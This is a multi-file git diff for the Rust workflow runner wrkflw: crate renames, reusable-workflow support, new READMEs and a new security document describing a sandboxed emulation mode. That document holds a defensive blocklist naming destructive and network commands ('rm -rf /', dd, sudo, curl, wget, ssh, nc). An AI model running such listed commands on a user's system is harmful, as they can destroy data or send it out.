// Clone minimal repository and checkout ref
let tempdir = tempfile::tempdir().map_err(|e| {
ExecutionError::Execution(format!("Failed to create temp dir: {}", e))
})?;
let repo_url = format!("https://github.com/{}/{}.git", owner, repo);
// git clone
let status = Command::new("git")
.arg("clone")
.arg("--depth")
.arg("1")
.arg("--branch")
.arg(&r#ref)
.arg(&repo_url)
.arg(tempdir.path())
.status()
.map_err(|e| ExecutionError::Execution(format!("Failed to execute git: {}", e)))?;
if !status.success() {
return Err(ExecutionError::Execution(format!(
"Failed to clone {}@{}",
repo_url, r#ref
)));
}
let joined = tempdir.path().join(path);
if !joined.exists() {
return Err(ExecutionError::Execution(format!(
"Reusable workflow file not found in repo: {}",
joined.display()
)));
}
joined
}
};
// Parse called workflow
let called = parse_workflow(&workflow_path)?;
// Create child env context
let mut child_env = ctx.env_context.clone();
if let Some(with_map) = with {
for (k, v) in with_map {
child_env.insert(format!("INPUT_{}", k.to_uppercase()), v.clone());
}
}
if let Some(secrets_val) = secrets {
if let Some(map) = secrets_val.as_mapping() {
for (k, v) in map {
if let (Some(key), Some(value)) = (k.as_str(), v.as_str()) {
child_env.insert(format!("SECRET_{}", key.to_uppercase()), value.to_string());
}
}
}
}
// Execute called workflow
let plan = dependency::resolve_dependencies(&called)?;
let mut all_results = Vec::new();
let mut any_failed = false;
for batch in plan {
let results =
execute_job_batch(&batch, &called, ctx.runtime, &child_env, ctx.verbose).await?;
for r in &results {
if r.status == JobStatus::Failure {
any_failed = true;
}
}
all_results.extend(results);
}
// Summarize into a single JobResult
let mut logs = String::new();
logs.push_str(&format!("Called workflow: {}\n", workflow_path.display()));
for r in &all_results {
logs.push_str(&format!("- {}: {:?}\n", r.name, r.status));
}
// Represent as one summary step for UI
let summary_step = StepResult {
name: format!("Run reusable workflow: {}", uses),
status: if any_failed {
StepStatus::Failure
} else {
StepStatus::Success
},
output: logs.clone(),
};
Ok(JobResult {
name: ctx.job_name.to_string(),
status: if any_failed {
JobStatus::Failure
} else {
JobStatus::Success
},
steps: vec![summary_step],
logs,
})
}
#[allow(dead_code)]
async fn prepare_runner_image(
image: &str,
@@ -1737,7 +1959,7 @@ async fn prepare_runner_image(
) -> Result<(), ExecutionError> {
// Try to pull the image first
if let Err(e) = runtime.pull_image(image).await {
logging::warning(&format!("Failed to pull image {}: {}", image, e));
wrkflw_logging::warning(&format!("Failed to pull image {}: {}", image, e));
}
// Check if this is a language-specific runner
@@ -1750,7 +1972,7 @@ async fn prepare_runner_image(
.map_err(|e| ExecutionError::Runtime(e.to_string()))
{
if verbose {
logging::info(&format!("Using customized image: {}", custom_image));
wrkflw_logging::info(&format!("Using customized image: {}", custom_image));
}
return Ok(());
}
@@ -2028,7 +2250,7 @@ fn evaluate_job_condition(
env_context: &HashMap<String, String>,
workflow: &WorkflowDefinition,
) -> bool {
logging::debug(&format!("Evaluating condition: {}", condition));
wrkflw_logging::debug(&format!("Evaluating condition: {}", condition));
// For now, implement basic pattern matching for common conditions
// TODO: Implement a full GitHub Actions expression evaluator
@@ -2051,14 +2273,14 @@ fn evaluate_job_condition(
if condition.contains("needs.") && condition.contains(".outputs.") {
// For now, simulate that outputs are available but empty
// This means conditions like needs.changes.outputs.source-code == 'true' will be false
logging::debug(
wrkflw_logging::debug(
"Evaluating needs.outputs condition - defaulting to false for local execution",
);
return false;
}
// Default to true for unknown conditions to avoid breaking workflows
logging::warning(&format!(
wrkflw_logging::warning(&format!(
"Unknown condition pattern: '{}' - defaulting to true",
condition
));


@@ -1,8 +1,8 @@
use chrono::Utc;
use matrix::MatrixCombination;
use parser::workflow::WorkflowDefinition;
use serde_yaml::Value;
use std::{collections::HashMap, fs, io, path::Path};
use wrkflw_matrix::MatrixCombination;
use wrkflw_parser::workflow::WorkflowDefinition;
pub fn setup_github_environment_files(workspace_dir: &Path) -> io::Result<()> {
// Create necessary directories


@@ -1,15 +1,15 @@
use async_trait::async_trait;
use logging;
use once_cell::sync::Lazy;
use runtime::container::{ContainerError, ContainerOutput, ContainerRuntime};
use std::collections::HashMap;
use std::path::Path;
use std::process::Stdio;
use std::sync::Mutex;
use tempfile;
use tokio::process::Command;
use utils;
use utils::fd;
use wrkflw_logging;
use wrkflw_runtime::container::{ContainerError, ContainerOutput, ContainerRuntime};
use wrkflw_utils;
use wrkflw_utils::fd;
static RUNNING_CONTAINERS: Lazy<Mutex<Vec<String>>> = Lazy::new(|| Mutex::new(Vec::new()));
// Map to track customized images for a job
@@ -46,7 +46,7 @@ impl PodmanRuntime {
match CUSTOMIZED_IMAGES.lock() {
Ok(images) => images.get(&key).cloned(),
Err(e) => {
logging::error(&format!("Failed to acquire lock: {}", e));
wrkflw_logging::error(&format!("Failed to acquire lock: {}", e));
None
}
}
@@ -58,7 +58,7 @@ impl PodmanRuntime {
if let Err(e) = CUSTOMIZED_IMAGES.lock().map(|mut images| {
images.insert(key, new_image.to_string());
}) {
logging::error(&format!("Failed to acquire lock: {}", e));
wrkflw_logging::error(&format!("Failed to acquire lock: {}", e));
}
}
@@ -68,7 +68,7 @@ impl PodmanRuntime {
let image_keys = match CUSTOMIZED_IMAGES.lock() {
Ok(keys) => keys,
Err(e) => {
logging::error(&format!("Failed to acquire lock: {}", e));
wrkflw_logging::error(&format!("Failed to acquire lock: {}", e));
return None;
}
};
@@ -103,7 +103,7 @@ impl PodmanRuntime {
match CUSTOMIZED_IMAGES.lock() {
Ok(images) => images.get(&key).cloned(),
Err(e) => {
logging::error(&format!("Failed to acquire lock: {}", e));
wrkflw_logging::error(&format!("Failed to acquire lock: {}", e));
None
}
}
@@ -130,7 +130,7 @@ impl PodmanRuntime {
if let Err(e) = CUSTOMIZED_IMAGES.lock().map(|mut images| {
images.insert(key, new_image.to_string());
}) {
logging::error(&format!("Failed to acquire lock: {}", e));
wrkflw_logging::error(&format!("Failed to acquire lock: {}", e));
}
}
@@ -151,7 +151,7 @@ impl PodmanRuntime {
}
cmd.stdout(Stdio::piped()).stderr(Stdio::piped());
logging::debug(&format!(
wrkflw_logging::debug(&format!(
"Running Podman command: podman {}",
args.join(" ")
));
@@ -192,7 +192,7 @@ impl PodmanRuntime {
match result {
Ok(output) => output,
Err(_) => {
logging::error("Podman operation timed out after 360 seconds");
wrkflw_logging::error("Podman operation timed out after 360 seconds");
Err(ContainerError::ContainerExecution(
"Operation timed out".to_string(),
))
@@ -244,7 +244,7 @@ pub fn is_available() -> bool {
}
}
Err(_) => {
logging::debug("Podman CLI is not available");
wrkflw_logging::debug("Podman CLI is not available");
return false;
}
}
@@ -257,7 +257,7 @@ pub fn is_available() -> bool {
{
Ok(rt) => rt,
Err(e) => {
logging::error(&format!(
wrkflw_logging::error(&format!(
"Failed to create runtime for Podman availability check: {}",
e
));
@@ -278,16 +278,16 @@ pub fn is_available() -> bool {
if output.status.success() {
true
} else {
logging::debug("Podman info command failed");
wrkflw_logging::debug("Podman info command failed");
false
}
}
Ok(Err(e)) => {
logging::debug(&format!("Podman info command error: {}", e));
wrkflw_logging::debug(&format!("Podman info command error: {}", e));
false
}
Err(_) => {
logging::debug("Podman info command timed out after 1 second");
wrkflw_logging::debug("Podman info command timed out after 1 second");
false
}
}
@@ -296,7 +296,7 @@ pub fn is_available() -> bool {
{
Ok(result) => result,
Err(_) => {
logging::debug("Podman availability check timed out");
wrkflw_logging::debug("Podman availability check timed out");
false
}
}
@@ -304,7 +304,9 @@ pub fn is_available() -> bool {
}) {
Ok(result) => result,
Err(_) => {
logging::debug("Failed to redirect stderr when checking Podman availability");
wrkflw_logging::debug(
"Failed to redirect stderr when checking Podman availability",
);
false
}
}
@@ -318,7 +320,7 @@ pub fn is_available() -> bool {
return match handle.join() {
Ok(result) => result,
Err(_) => {
logging::warning("Podman availability check thread panicked");
wrkflw_logging::warning("Podman availability check thread panicked");
false
}
};
@@ -326,7 +328,9 @@ pub fn is_available() -> bool {
std::thread::sleep(std::time::Duration::from_millis(50));
}
logging::warning("Podman availability check timed out, assuming Podman is not available");
wrkflw_logging::warning(
"Podman availability check timed out, assuming Podman is not available",
);
false
}
@@ -352,12 +356,12 @@ pub async fn cleanup_resources() {
match tokio::time::timeout(cleanup_timeout, cleanup_containers()).await {
Ok(result) => {
if let Err(e) = result {
logging::error(&format!("Error during container cleanup: {}", e));
wrkflw_logging::error(&format!("Error during container cleanup: {}", e));
}
}
Err(_) => {
logging::warning("Podman cleanup timed out, some resources may not have been removed")
}
Err(_) => wrkflw_logging::warning(
"Podman cleanup timed out, some resources may not have been removed",
),
}
}
@@ -369,7 +373,7 @@ pub async fn cleanup_containers() -> Result<(), String> {
match RUNNING_CONTAINERS.try_lock() {
Ok(containers) => containers.clone(),
Err(_) => {
logging::error("Could not acquire container lock for cleanup");
wrkflw_logging::error("Could not acquire container lock for cleanup");
vec![]
}
}
@@ -378,7 +382,7 @@ pub async fn cleanup_containers() -> Result<(), String> {
{
Ok(containers) => containers,
Err(_) => {
logging::error("Timeout while trying to get containers for cleanup");
wrkflw_logging::error("Timeout while trying to get containers for cleanup");
vec![]
}
};
@@ -387,7 +391,7 @@ pub async fn cleanup_containers() -> Result<(), String> {
return Ok(());
}
logging::info(&format!(
wrkflw_logging::info(&format!(
"Cleaning up {} containers",
containers_to_cleanup.len()
));
@@ -408,15 +412,18 @@ pub async fn cleanup_containers() -> Result<(), String> {
match stop_result {
Ok(Ok(output)) => {
if output.status.success() {
logging::debug(&format!("Stopped container: {}", container_id));
wrkflw_logging::debug(&format!("Stopped container: {}", container_id));
} else {
logging::warning(&format!("Error stopping container {}", container_id));
wrkflw_logging::warning(&format!("Error stopping container {}", container_id));
}
}
Ok(Err(e)) => {
logging::warning(&format!("Error stopping container {}: {}", container_id, e))
Ok(Err(e)) => wrkflw_logging::warning(&format!(
"Error stopping container {}: {}",
container_id, e
)),
Err(_) => {
wrkflw_logging::warning(&format!("Timeout stopping container: {}", container_id))
}
Err(_) => logging::warning(&format!("Timeout stopping container: {}", container_id)),
}
// Then try to remove it
@@ -433,15 +440,18 @@ pub async fn cleanup_containers() -> Result<(), String> {
match remove_result {
Ok(Ok(output)) => {
if output.status.success() {
logging::debug(&format!("Removed container: {}", container_id));
wrkflw_logging::debug(&format!("Removed container: {}", container_id));
} else {
logging::warning(&format!("Error removing container {}", container_id));
wrkflw_logging::warning(&format!("Error removing container {}", container_id));
}
}
Ok(Err(e)) => {
logging::warning(&format!("Error removing container {}: {}", container_id, e))
Ok(Err(e)) => wrkflw_logging::warning(&format!(
"Error removing container {}: {}",
container_id, e
)),
Err(_) => {
wrkflw_logging::warning(&format!("Timeout removing container: {}", container_id))
}
Err(_) => logging::warning(&format!("Timeout removing container: {}", container_id)),
}
// Always untrack the container whether or not we succeeded to avoid future cleanup attempts
@@ -462,7 +472,7 @@ impl ContainerRuntime for PodmanRuntime {
volumes: &[(&Path, &Path)],
) -> Result<ContainerOutput, ContainerError> {
// Print detailed debugging info
logging::info(&format!("Podman: Running container with image: {}", image));
wrkflw_logging::info(&format!("Podman: Running container with image: {}", image));
let timeout_duration = std::time::Duration::from_secs(360); // 6 minutes timeout
@@ -475,7 +485,7 @@ impl ContainerRuntime for PodmanRuntime {
{
Ok(result) => result,
Err(_) => {
logging::error("Podman operation timed out after 360 seconds");
wrkflw_logging::error("Podman operation timed out after 360 seconds");
Err(ContainerError::ContainerExecution(
"Operation timed out".to_string(),
))
@@ -490,7 +500,7 @@ impl ContainerRuntime for PodmanRuntime {
match tokio::time::timeout(timeout_duration, self.pull_image_inner(image)).await {
Ok(result) => result,
Err(_) => {
logging::warning(&format!(
wrkflw_logging::warning(&format!(
"Pull of image {} timed out, continuing with existing image",
image
));
@@ -508,7 +518,7 @@ impl ContainerRuntime for PodmanRuntime {
{
Ok(result) => result,
Err(_) => {
logging::error(&format!(
wrkflw_logging::error(&format!(
"Building image {} timed out after 120 seconds",
tag
));
@@ -664,9 +674,9 @@ impl PodmanRuntime {
working_dir: &Path,
volumes: &[(&Path, &Path)],
) -> Result<ContainerOutput, ContainerError> {
logging::debug(&format!("Running command in Podman: {:?}", cmd));
logging::debug(&format!("Environment: {:?}", env_vars));
logging::debug(&format!("Working directory: {}", working_dir.display()));
wrkflw_logging::debug(&format!("Running command in Podman: {:?}", cmd));
wrkflw_logging::debug(&format!("Environment: {:?}", env_vars));
wrkflw_logging::debug(&format!("Working directory: {}", working_dir.display()));
// Generate a unique container name
let container_name = format!("wrkflw-{}", uuid::Uuid::new_v4());
@@ -742,13 +752,13 @@ impl PodmanRuntime {
match cleanup_result {
Ok(Ok(cleanup_output)) => {
if !cleanup_output.status.success() {
logging::debug(&format!(
wrkflw_logging::debug(&format!(
"Failed to remove successful container {}",
container_name
));
}
}
_ => logging::debug(&format!(
_ => wrkflw_logging::debug(&format!(
"Timeout removing successful container {}",
container_name
)),
@@ -760,7 +770,7 @@ impl PodmanRuntime {
// Failed container
if self.preserve_containers_on_failure {
// Failed and we want to preserve - don't clean up but untrack from auto-cleanup
logging::info(&format!(
wrkflw_logging::info(&format!(
"Preserving failed container {} for debugging (exit code: {}). Use 'podman exec -it {} bash' to inspect.",
container_name, output.exit_code, container_name
));
@@ -789,11 +799,11 @@ impl PodmanRuntime {
.await;
match cleanup_result {
Ok(Ok(_)) => logging::debug(&format!(
Ok(Ok(_)) => wrkflw_logging::debug(&format!(
"Cleaned up failed execution container {}",
container_name
)),
_ => logging::debug(&format!(
_ => wrkflw_logging::debug(&format!(
"Failed to clean up execution failure container {}",
container_name
)),
@@ -806,17 +816,17 @@ impl PodmanRuntime {
match &result {
Ok(output) => {
if output.exit_code != 0 {
logging::info(&format!(
wrkflw_logging::info(&format!(
"Podman command failed with exit code: {}",
output.exit_code
));
logging::debug(&format!("Failed command: {:?}", cmd));
logging::debug(&format!("Working directory: {}", working_dir.display()));
logging::debug(&format!("STDERR: {}", output.stderr));
wrkflw_logging::debug(&format!("Failed command: {:?}", cmd));
wrkflw_logging::debug(&format!("Working directory: {}", working_dir.display()));
wrkflw_logging::debug(&format!("STDERR: {}", output.stderr));
}
}
Err(e) => {
logging::error(&format!("Podman execution error: {}", e));
wrkflw_logging::error(&format!("Podman execution error: {}", e));
}
}


@@ -1,13 +1,18 @@
[package]
name = "github"
name = "wrkflw-github"
version.workspace = true
edition.workspace = true
description = "github functionality for wrkflw"
description = "GitHub API integration for wrkflw workflow execution engine"
license.workspace = true
documentation.workspace = true
homepage.workspace = true
repository.workspace = true
keywords.workspace = true
categories.workspace = true
[dependencies]
# Add other crate dependencies as needed
models = { path = "../models" }
# Internal crates
wrkflw-models = { path = "../models", version = "0.7.0" }
# External dependencies from workspace
serde.workspace = true

crates/github/README.md (new file)

@@ -0,0 +1,23 @@
## wrkflw-github
GitHub integration helpers used by `wrkflw` to list/trigger workflows.
- **List workflows** in `.github/workflows`
- **Trigger workflow_dispatch** events over the GitHub API
### Example
```rust
use wrkflw_github::{get_repo_info, trigger_workflow};
# tokio_test::block_on(async {
let info = get_repo_info()?;
println!("{}/{} (default branch: {})", info.owner, info.repo, info.default_branch);
// Requires GITHUB_TOKEN in env
trigger_workflow("ci", Some("main"), None).await?;
# Ok::<_, Box<dyn std::error::Error>>(())
# })?;
```
Notes: set `GITHUB_TOKEN` with the `workflow` scope; only public repos are supported out-of-the-box.


@@ -1,13 +1,18 @@
[package]
name = "gitlab"
name = "wrkflw-gitlab"
version.workspace = true
edition.workspace = true
description = "gitlab functionality for wrkflw"
description = "GitLab API integration for wrkflw workflow execution engine"
license.workspace = true
documentation.workspace = true
homepage.workspace = true
repository.workspace = true
keywords.workspace = true
categories.workspace = true
[dependencies]
# Internal crates
models = { path = "../models" }
wrkflw-models = { path = "../models", version = "0.7.0" }
# External dependencies
lazy_static.workspace = true

crates/gitlab/README.md (new file)

@@ -0,0 +1,23 @@
## wrkflw-gitlab
GitLab integration helpers used by `wrkflw` to trigger pipelines.
- Reads repo info from local git remote
- Triggers pipelines via GitLab API
### Example
```rust
use wrkflw_gitlab::{get_repo_info, trigger_pipeline};
# tokio_test::block_on(async {
let info = get_repo_info()?;
println!("{}/{} (default branch: {})", info.namespace, info.project, info.default_branch);
// Requires GITLAB_TOKEN in env (api scope)
trigger_pipeline(Some("main"), None).await?;
# Ok::<_, Box<dyn std::error::Error>>(())
# })?;
```
Notes: looks for `.gitlab-ci.yml` in the repo root when listing pipelines.


@@ -1,13 +1,18 @@
[package]
name = "logging"
name = "wrkflw-logging"
version.workspace = true
edition.workspace = true
description = "logging functionality for wrkflw"
description = "Logging functionality for wrkflw workflow execution engine"
license.workspace = true
documentation.workspace = true
homepage.workspace = true
repository.workspace = true
keywords.workspace = true
categories.workspace = true
[dependencies]
# Internal crates
models = { path = "../models" }
wrkflw-models = { path = "../models", version = "0.7.0" }
# External dependencies
chrono.workspace = true

crates/logging/README.md (new file)

@@ -0,0 +1,22 @@
## wrkflw-logging
Lightweight in-memory logging with simple levels for TUI/CLI output.
- Thread-safe, timestamped messages
- Level filtering (Debug/Info/Warning/Error)
- Pluggable into UI for live log views
### Example
```rust
use wrkflw_logging::{info, warning, error, LogLevel, set_log_level, get_logs};
set_log_level(LogLevel::Info);
info("starting");
warning("be careful");
error("boom");
for line in get_logs() {
println!("{}", line);
}
```


@@ -1,13 +1,18 @@
[package]
name = "matrix"
name = "wrkflw-matrix"
version.workspace = true
edition.workspace = true
description = "matrix functionality for wrkflw"
description = "Matrix job parallelization for wrkflw workflow execution engine"
license.workspace = true
documentation.workspace = true
homepage.workspace = true
repository.workspace = true
keywords.workspace = true
categories.workspace = true
[dependencies]
# Internal crates
models = { path = "../models" }
wrkflw-models = { path = "../models", version = "0.7.0" }
# External dependencies
indexmap.workspace = true

crates/matrix/README.md (new file)

@@ -0,0 +1,20 @@
## wrkflw-matrix
Matrix expansion utilities used to compute all job combinations and format labels.
- Supports `include`, `exclude`, `max-parallel`, and `fail-fast`
- Provides display helpers for UI/CLI
### Example
```rust
use wrkflw_matrix::{MatrixConfig, expand_matrix};
use serde_yaml::Value;
use std::collections::HashMap;
let mut cfg = MatrixConfig::default();
cfg.parameters.insert("os".into(), Value::from(vec!["ubuntu", "alpine"]));
let combos = expand_matrix(&cfg).expect("expand");
assert!(!combos.is_empty());
```
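The expansion itself is a plain cartesian product over the parameter lists. As a rough illustration of what `expand_matrix` computes (standard library only, not the crate's actual API or types):

```rust
use std::collections::BTreeMap;

// Stand-in for the crate's expansion: build every combination of the
// matrix parameters, one key at a time.
fn expand(params: &BTreeMap<String, Vec<String>>) -> Vec<BTreeMap<String, String>> {
    let mut combos: Vec<BTreeMap<String, String>> = vec![BTreeMap::new()];
    for (key, values) in params {
        let mut next = Vec::new();
        for combo in &combos {
            for v in values {
                let mut c = combo.clone();
                c.insert(key.clone(), v.clone());
                next.push(c);
            }
        }
        combos = next;
    }
    combos
}

fn main() {
    let mut params = BTreeMap::new();
    params.insert("os".to_string(), vec!["ubuntu".to_string(), "alpine".to_string()]);
    params.insert("rust".to_string(), vec!["stable".to_string(), "beta".to_string()]);
    let combos = expand(&params);
    assert_eq!(combos.len(), 4); // 2 os values x 2 rust values
    println!("{} combinations", combos.len());
}
```

`include`/`exclude` then add or filter entries in this combination list before jobs are scheduled.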


@@ -1,12 +1,17 @@
[package]
name = "models"
name = "wrkflw-models"
version.workspace = true
edition.workspace = true
description = "Data models for wrkflw"
description = "Data models and structures for wrkflw workflow execution engine"
license.workspace = true
documentation.workspace = true
homepage.workspace = true
repository.workspace = true
keywords.workspace = true
categories.workspace = true
[dependencies]
serde.workspace = true
serde_yaml.workspace = true
serde_json.workspace = true
thiserror.workspace = true
thiserror.workspace = true

crates/models/README.md (new file)

@@ -0,0 +1,16 @@
## wrkflw-models
Common data structures shared across crates.
- `ValidationResult` for structural/semantic checks
- GitLab pipeline models (serde types)
### Example
```rust
use wrkflw_models::ValidationResult;
let mut res = ValidationResult::new();
res.add_issue("missing jobs".into());
assert!(!res.is_valid);
```


@@ -1,14 +1,19 @@
[package]
name = "parser"
name = "wrkflw-parser"
version.workspace = true
edition.workspace = true
description = "Parser functionality for wrkflw"
description = "Workflow parsing functionality for wrkflw execution engine"
license.workspace = true
documentation.workspace = true
homepage.workspace = true
repository.workspace = true
keywords.workspace = true
categories.workspace = true
[dependencies]
# Internal crates
models = { path = "../models" }
matrix = { path = "../matrix" }
wrkflw-models = { path = "../models", version = "0.7.0" }
wrkflw-matrix = { path = "../matrix", version = "0.7.0" }
# External dependencies
jsonschema.workspace = true

crates/parser/README.md (new file)

@@ -0,0 +1,13 @@
## wrkflw-parser
Parsers and schema helpers for GitHub/GitLab workflow files.
- GitHub Actions workflow parsing and JSON Schema validation
- GitLab CI parsing helpers
### Example
```rust
// High-level crates (`wrkflw` and `wrkflw-executor`) wrap parser usage.
// Use those unless you are extending parsing behavior directly.
```

File diff suppressed because it is too large

File diff suppressed because it is too large


@@ -1,11 +1,11 @@
use crate::schema::{SchemaType, SchemaValidator};
use crate::workflow;
use models::gitlab::Pipeline;
use models::ValidationResult;
use std::collections::HashMap;
use std::fs;
use std::path::Path;
use thiserror::Error;
use wrkflw_models::gitlab::Pipeline;
use wrkflw_models::ValidationResult;
#[derive(Error, Debug)]
pub enum GitlabParserError {
@@ -130,7 +130,7 @@ pub fn convert_to_workflow_format(pipeline: &Pipeline) -> workflow::WorkflowDefi
// Create a new job
let mut job = workflow::Job {
runs_on: "ubuntu-latest".to_string(), // Default runner
runs_on: Some(vec!["ubuntu-latest".to_string()]), // Default runner
needs: None,
steps: Vec::new(),
env: HashMap::new(),
@@ -139,6 +139,9 @@ pub fn convert_to_workflow_format(pipeline: &Pipeline) -> workflow::WorkflowDefi
if_condition: None,
outputs: None,
permissions: None,
uses: None,
with: None,
secrets: None,
};
// Add job-specific environment variables
@@ -204,8 +207,8 @@ pub fn convert_to_workflow_format(pipeline: &Pipeline) -> workflow::WorkflowDefi
for (i, service) in services.iter().enumerate() {
let service_name = format!("service-{}", i);
let service_image = match service {
models::gitlab::Service::Simple(name) => name.clone(),
models::gitlab::Service::Detailed { name, .. } => name.clone(),
wrkflw_models::gitlab::Service::Simple(name) => name.clone(),
wrkflw_models::gitlab::Service::Detailed { name, .. } => name.clone(),
};
let service = workflow::Service {
@@ -230,13 +233,13 @@ pub fn convert_to_workflow_format(pipeline: &Pipeline) -> workflow::WorkflowDefi
#[cfg(test)]
mod tests {
use super::*;
use std::path::PathBuf;
// use std::path::PathBuf; // unused
use tempfile::NamedTempFile;
#[test]
fn test_parse_simple_pipeline() {
// Create a temporary file with a simple GitLab CI/CD pipeline
let mut file = NamedTempFile::new().unwrap();
let file = NamedTempFile::new().unwrap();
let content = r#"
stages:
- build


@@ -3,8 +3,8 @@ use serde_json::Value;
use std::fs;
use std::path::Path;
const GITHUB_WORKFLOW_SCHEMA: &str = include_str!("../../../schemas/github-workflow.json");
const GITLAB_CI_SCHEMA: &str = include_str!("../../../schemas/gitlab-ci.json");
const GITHUB_WORKFLOW_SCHEMA: &str = include_str!("github-workflow.json");
const GITLAB_CI_SCHEMA: &str = include_str!("gitlab-ci.json");
#[derive(Debug, Clone, Copy)]
pub enum SchemaType {


@@ -1,8 +1,8 @@
use matrix::MatrixConfig;
use serde::{Deserialize, Deserializer, Serialize};
use std::collections::HashMap;
use std::fs;
use std::path::Path;
use wrkflw_matrix::MatrixConfig;
use super::schema::SchemaValidator;
@@ -26,6 +26,26 @@ where
}
}
// Custom deserializer for runs-on field that handles both string and array formats
fn deserialize_runs_on<'de, D>(deserializer: D) -> Result<Option<Vec<String>>, D::Error>
where
D: Deserializer<'de>,
{
#[derive(Deserialize)]
#[serde(untagged)]
enum StringOrVec {
String(String),
Vec(Vec<String>),
}
let value = Option::<StringOrVec>::deserialize(deserializer)?;
match value {
Some(StringOrVec::String(s)) => Ok(Some(vec![s])),
Some(StringOrVec::Vec(v)) => Ok(Some(v)),
None => Ok(None),
}
}
#[derive(Debug, Deserialize, Serialize)]
pub struct WorkflowDefinition {
pub name: String,
@@ -38,10 +58,11 @@ pub struct WorkflowDefinition {
#[derive(Debug, Deserialize, Serialize)]
pub struct Job {
#[serde(rename = "runs-on")]
pub runs_on: String,
#[serde(rename = "runs-on", default, deserialize_with = "deserialize_runs_on")]
pub runs_on: Option<Vec<String>>,
#[serde(default, deserialize_with = "deserialize_needs")]
pub needs: Option<Vec<String>>,
#[serde(default)]
pub steps: Vec<Step>,
#[serde(default)]
pub env: HashMap<String, String>,
@@ -55,6 +76,13 @@ pub struct Job {
pub outputs: Option<HashMap<String, String>>,
#[serde(default)]
pub permissions: Option<HashMap<String, String>>,
// Reusable workflow (job-level 'uses') support
#[serde(default)]
pub uses: Option<String>,
#[serde(default)]
pub with: Option<HashMap<String, String>>,
#[serde(default)]
pub secrets: Option<serde_yaml::Value>,
}
#[derive(Debug, Deserialize, Serialize)]


@@ -1,14 +1,19 @@
[package]
name = "runtime"
name = "wrkflw-runtime"
version.workspace = true
edition.workspace = true
description = "Runtime environment for wrkflw"
description = "Runtime execution environment for wrkflw workflow engine"
license.workspace = true
documentation.workspace = true
homepage.workspace = true
repository.workspace = true
keywords.workspace = true
categories.workspace = true
[dependencies]
# Internal crates
models = { path = "../models" }
logging = { path = "../logging", version = "0.4.0" }
wrkflw-models = { path = "../models", version = "0.7.0" }
wrkflw-logging = { path = "../logging", version = "0.7.0" }
# External dependencies
async-trait.workspace = true
@@ -18,5 +23,7 @@ serde_yaml.workspace = true
tempfile = "3.9"
tokio.workspace = true
futures = "0.3"
utils = { path = "../utils", version = "0.4.0" }
wrkflw-utils = { path = "../utils", version = "0.7.0" }
which = "4.4"
regex = "1.10"
thiserror = "1.0"

crates/runtime/README.md (new file)

@@ -0,0 +1,13 @@
## wrkflw-runtime
Runtime abstractions for executing steps in containers or emulation.
- Container management primitives used by the executor
- Emulation mode helpers (run on host without containers)
### Example
```rust
// This crate is primarily consumed by `wrkflw-executor`.
// Prefer using the executor API instead of calling runtime directly.
```


@@ -0,0 +1,258 @@
# Security Features in wrkflw Runtime
This document describes the security features implemented in the wrkflw runtime, particularly the sandboxing capabilities for emulation mode.
## Overview
The wrkflw runtime provides multiple execution modes with varying levels of security:
1. **Docker Mode** - Uses Docker containers for isolation (recommended for production)
2. **Podman Mode** - Uses Podman containers for isolation with rootless support
3. **Secure Emulation Mode** - 🔒 **NEW**: Sandboxed execution on the host system
4. **Emulation Mode** - ⚠️ **UNSAFE**: Direct execution on the host system (deprecated)
## Security Modes
### 🔒 Secure Emulation Mode (Recommended for Local Development)
The secure emulation mode provides comprehensive sandboxing to protect your system from potentially harmful commands while still allowing legitimate workflow operations.
#### Features
- **Command Validation**: Blocks dangerous commands like `rm -rf /`, `dd`, `sudo`, etc.
- **Pattern Detection**: Uses regex patterns to detect dangerous command combinations
- **Resource Limits**: Enforces CPU, memory, and execution time limits
- **Filesystem Isolation**: Restricts file access to allowed paths only
- **Environment Sanitization**: Filters dangerous environment variables
- **Process Monitoring**: Tracks and limits spawned processes
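Environment sanitization, for instance, amounts to dropping variables that could alter loader or interpreter behavior before a step runs. A minimal sketch with an assumed blocklist (the names here are illustrative, not the sandbox's actual list):

```rust
use std::collections::HashMap;

// Drop environment variables that can inject code into child processes.
// The blocklist below is an assumption for illustration only.
fn sanitize_env(env: &HashMap<String, String>) -> HashMap<String, String> {
    const BLOCKED: &[&str] = &["LD_PRELOAD", "LD_LIBRARY_PATH", "DYLD_INSERT_LIBRARIES"];
    env.iter()
        .filter(|(k, _)| !BLOCKED.contains(&k.as_str()))
        .map(|(k, v)| (k.clone(), v.clone()))
        .collect()
}

fn main() {
    let mut env = HashMap::new();
    env.insert("PATH".to_string(), "/usr/bin".to_string());
    env.insert("LD_PRELOAD".to_string(), "/tmp/evil.so".to_string());
    let clean = sanitize_env(&env);
    assert!(clean.contains_key("PATH"));
    assert!(!clean.contains_key("LD_PRELOAD"));
    println!("sanitized down to {} vars", clean.len());
}
```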
#### Usage
```bash
# Use secure emulation mode (recommended)
wrkflw run --runtime secure-emulation .github/workflows/build.yml
# Or via TUI
wrkflw tui --runtime secure-emulation
```
#### Command Whitelist/Blacklist
**Allowed Commands (Safe):**
- Basic utilities: `echo`, `cat`, `ls`, `grep`, `sed`, `awk`
- Development tools: `cargo`, `npm`, `python`, `git`, `node`
- Build tools: `make`, `cmake`, `javac`, `dotnet`
**Blocked Commands (Dangerous):**
- System modification: `rm`, `dd`, `mkfs`, `mount`, `sudo`
- Network tools: `wget`, `curl`, `ssh`, `nc`
- Process control: `kill`, `killall`, `systemctl`
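Conceptually, validation first checks the command name against the whitelist, then scans the full line for known-dangerous patterns. A minimal sketch; the lists here are illustrative and much shorter than the sandbox's real configuration:

```rust
// Illustrative lists only; the actual sandbox configuration differs.
const ALLOWED: &[&str] = &["echo", "cat", "ls", "grep", "cargo", "npm", "git", "make"];
const DANGEROUS_PATTERNS: &[&str] = &["rm -rf /", "| sh", "> /dev/"];

fn is_command_allowed(cmd: &str) -> bool {
    ALLOWED.contains(&cmd)
}

fn has_dangerous_pattern(line: &str) -> bool {
    DANGEROUS_PATTERNS.iter().any(|p| line.contains(p))
}

fn validate(line: &str) -> Result<(), String> {
    // Whitelist check on the command name (first token).
    let cmd = line.split_whitespace().next().unwrap_or("");
    if !is_command_allowed(cmd) {
        return Err(format!("SECURITY BLOCK: command '{}' is not allowed", cmd));
    }
    // Pattern check on the whole line catches allowed commands piped
    // into dangerous constructs.
    if has_dangerous_pattern(line) {
        return Err(format!("SECURITY BLOCK: dangerous pattern in '{}'", line));
    }
    Ok(())
}

fn main() {
    assert!(validate("cargo build --release").is_ok());
    assert!(validate("rm -rf /tmp").is_err()); // 'rm' is not whitelisted
    assert!(validate("cat setup.sh | sh").is_err()); // pattern match
    println!("validation sketch ok");
}
```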
#### Resource Limits
```rust
// Default configuration
